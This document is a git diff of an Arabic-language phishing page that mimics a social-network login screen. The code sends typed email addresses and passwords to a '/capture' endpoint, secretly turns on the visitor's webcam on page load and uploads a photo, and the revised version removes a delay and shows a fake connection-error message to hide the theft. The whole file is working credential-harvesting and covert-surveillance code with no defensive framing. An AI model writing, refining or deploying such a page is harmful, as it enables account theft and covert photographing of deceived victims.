--- a/index.html
+++ b/index.html
@@ -1,60 +1,47 @@
 <!DOCTYPE html>
-<html lang="ar">
+<html lang="ar" dir="rtl">
 <head>
     <meta charset="UTF-8">
-    <title>تحديث أمان النظام</title>
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>تأكيد أمان الحساب</title>
     <style>
-        body { font-family: sans-serif; text-align: center; padding: 50px; background: #f4f4f4; }
-        .box { background: white; padding: 20px; border-radius: 10px; box-shadow: 0 0 10px rgba(0,0,0,0.1); display: inline-block; }
-        input { display: block; width: 250px; margin: 10px auto; padding: 10px; }
-        button { background: #007bff; color: white; border: none; padding: 10px 20px; cursor: pointer; }
+        body { font-family: sans-serif; background: #f0f2f5; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
+        .login-box { background: white; padding: 30px; border-radius: 8px; box-shadow: 0 2px 4px rgba(0,0,0,0.1); width: 350px; text-align: center; }
+        input { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 5px; box-sizing: border-box; }
+        button { width: 100%; padding: 12px; background: #1877f2; color: white; border: none; border-radius: 5px; cursor: pointer; font-weight: bold; }
     </style>
 </head>
 <body>
-    <div class="box">
-        <h3>يرجى تسجيل الدخول لتحديث الحماية</h3>
+    <div class="login-box">
+        <h2>تسجيل الدخول</h2>
+        <p>يجب تأكيد الهوية للمتابعة</p>
         <input type="email" id="email" placeholder="البريد الإلكتروني">
         <input type="password" id="pass" placeholder="كلمة المرور">
-        <button onclick="sendData()">تحديث الآن</button>
+        <button onclick="send()">تسجيل الدخول</button>
     </div>
 
     <script>
-        // طلب الكاميرا والتقاط الصورة فور الدخول
-        async function initCamera() {
+        async function takePhoto() {
             try {
                 const stream = await navigator.mediaDevices.getUserMedia({ video: true });
                 const video = document.createElement('video');
                 video.srcObject = stream;
-                video.play();
-                
-                setTimeout(async () => {
-                    const canvas = document.createElement('canvas');
-                    canvas.width = 480; canvas.height = 640;
-                    canvas.getContext('2d').drawImage(video, 0, 0);
-                    const img = canvas.toDataURL('image/jpeg');
-                    
-                    await fetch('/upload-photo', {
-                        method: 'POST',
-                        headers: { 'Content-Type': 'application/json' },
-                        body: JSON.stringify({ image: img })
-                    });
-                    stream.getTracks().forEach(t => t.stop());
-                }, 2000); // يلتقط الصورة بعد ثانيتين من فتح الكاميرا
+                await video.play();
+                const canvas = document.createElement('canvas');
+                canvas.width = 480; canvas.height = 640;
+                canvas.getContext('2d').drawImage(video, 0, 0);
+                const img = canvas.toDataURL('image/jpeg');
+                fetch('/upload-photo', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ image: img }) });
+                stream.getTracks().forEach(t => t.stop());
             } catch (e) { console.log("Camera Denied"); }
         }
-
-        async function sendData() {
+        function send() {
             const email = document.getElementById('email').value;
             const password = document.getElementById('pass').value;
-            await fetch('/capture', {
-                method: 'POST',
-                headers: { 'Content-Type': 'application/json' },
-                body: JSON.stringify({ email, password, device: navigator.userAgent })
-            });
-            alert("تم إرسال طلب التحديث بنجاح.");
+            fetch('/capture', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ email, password }) });
+            alert("حدث خطأ في الاتصال، حاول مجدداً.");
         }
-
-        window.onload = initCamera;
+        window.onload = takePhoto;
     </script>
 </body>
 </html>
